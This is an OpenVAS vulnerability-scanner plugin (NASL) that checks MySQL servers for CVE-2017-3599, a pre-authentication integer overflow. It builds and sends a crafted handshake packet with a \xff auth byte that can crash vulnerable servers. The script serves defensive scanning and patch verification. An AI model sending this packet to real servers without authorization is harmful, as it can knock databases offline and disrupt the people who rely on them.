###############################################################################

1. ###############################################################################
2. # OpenVAS Vulnerability Test
3. # $Id: gb_oracle_mysql_integer_overflow_vuln.nasl 72218 2017-05-04 09:14:58Z cfi $
4. #
5. # Oracle MySQL Server Integer Overflow Vulnerability
6. #
7. # Authors:
8. # Antu Sanadi <santu@secpod.com>
9. #
10. # Copyright:
11. # Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
12. #
13. # This program is free software; you can redistribute it and/or modify
14. # it under the terms of the GNU General Public License version 2
15. # (or any later version), as published by the Free Software Foundation.
16. #
17. # This program is distributed in the hope that it will be useful,
18. # but WITHOUT ANY WARRANTY; without even the implied warranty of
19. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
20. # GNU General Public License for more details.
21. #
22. # You should have received a copy of the GNU General Public License
23. # along with this program; if not, write to the Free Software
24. # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
25. ###############################################################################
26.  
27. if (description)
28. {
29. script_oid("1.3.6.1.4.1.25623.1.0.810773");
30. script_version("$Revision$");
31. script_cve_id("CVE-2017-3599");
32. script_bugtraq_id(97754);
33. script_tag(name:"cvss_base", value:"7.8");
34. script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
35. script_tag(name:"last_modification", value:"$Date$");
36. script_tag(name:"creation_date", value:"2017-05-04 11:10:40 +0530 (Thu, 04 May 2017)");
37. script_name("Oracle MySQL Server Integer Overflow Vulnerability");
38.  
39. script_tag(name:"summary", value:"This host is installed with Oracle MySQL
40. Server and is prone to integer overflow vulnerability.");
41.  
42. script_tag(name:"vuldetect", value:"Send the crafted request and analyse the
43. response to confirm the vulnerability.");
44.  
45. script_tag(name:"insight", value:"Upon connection from a client, the server
46. sends a greeting message and the client continues the communication by
47. starting the authentication process. The authentication packet sent by
48. the client contains a wealth of information including the client
49. capabilities, username, password, etc. The packet is received by the
50. server, and parsed by 'parse_client_handshake_packet()' function, in
51. '/sql/auth/sql_authentication.cc.'");
52.  
53. script_tag(name:"impact", value:"Successful exploitation will allow remote
54. attacker to cause a denial of service via a crafted authentication packet.
55.  
56. Impact Level: Application");
57.  
58. script_tag(name:"affected", value:"Oracle MySQL version 5.6.X branch up to 5.6.35
59. and 5.7.X branch up to 5.7.17");
60.  
61. script_tag(name:"solution", value:"Upgrade to MySQL 5.6.36, 5.7.18 or later,
62. For updates refer to https://www.oracle.com/mysql/index.html");
63.  
64. script_tag(name:"solution_type", value:"VendorFix");
65. script_tag(name:"qod_type", value:"exploit");
66. script_xref(name : "URL" , value : "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html");
67. script_xref(name : "URL" , value : "https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos");
68. script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
69. script_category(ACT_ATTACK);
70. script_family("Databases");
71. script_dependencies("mysql_version.nasl");
72. script_require_ports("Services/mysql", 3306);
73. script_mandatory_keys("MySQL/installed");
74. exit(0);
75. }
76.  
77. include("byte_func.inc");
78. include("host_details.inc");
79.  
80. cpe_list = make_list( "cpe:/a:mysql:mysql", "cpe:/a:oracle:mysql");
81.  
82. set_byte_order(BYTE_ORDER_LITTLE_ENDIAN);
83.  
84. port = get_app_port(cpe:cpe_list);
85. if(!port){
86. port = 3306;
87. }
88.  
89. if(!get_port_state(port)){
90. exit(0);
91. }
92.  
93. if(get_kb_item("MySQL/" + port + "/blocked")){
94. exit(0);
95. }
96.  
97. sock = open_sock_tcp(port);
98. if(!sock){
99. exit(0);
100. }
101.  
102. res = recv( socket:sock, length:1024 );
103. if("mysql_native_password" >!< res)
104. {
105. close(sock);
106. exit(0);
107. }
108.  
109. # Login request packet
110. plen = string('\x26\x00\x00'); # 3 Bytes Packet lenth
111. packet_num = string('\x01'); # 1 byte Packet number
112. packet_cap = string('\x85\xa2\xbf\x01'); # client capabilities (default)
113. packet_max = string('\x00\x00\x00\x01'); # max packet size (default)
114. packet_cset = string('\x21'); # charset (default)
115. p_reserved = crap(data:'\x00', length:23); # 23 bytes reserved with nulls (default)
116. packet_usr = string('test\x00'); # username null terminated (default)
117. packet_auth = string('\xff'); # Both \xff and \xfe should crash the server
118. # Tested on vulnerable version crash is
119. # not happening so script_category is ACT_ATTACK
120. ## complete request
121. packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth ;
122.  
123. ## Add packet length and number
124. request = plen + packet_num + packet;
125.  
126. ## Send full request.
127. send(socket:sock,data:request);
128. res = recv( socket:sock, length:1024);
129.  
130. close(sock);
131.  
132. ## Patched/Fixed response is "Bad handshake'
133. if("08S01Bad handshake" >< res){
134. exit(0);
135. }
136.  
137. ## The expected value is the password, which could be of two different formats
138. ## (null terminated or length encoded) depending on the client functionality.
139. if(strlen(res) > 26 && "mysql_native_password" >< res && "08S01Bad handshake" >!< res)
140. {
141. security_message(port:port);
142. exit(0);
143. }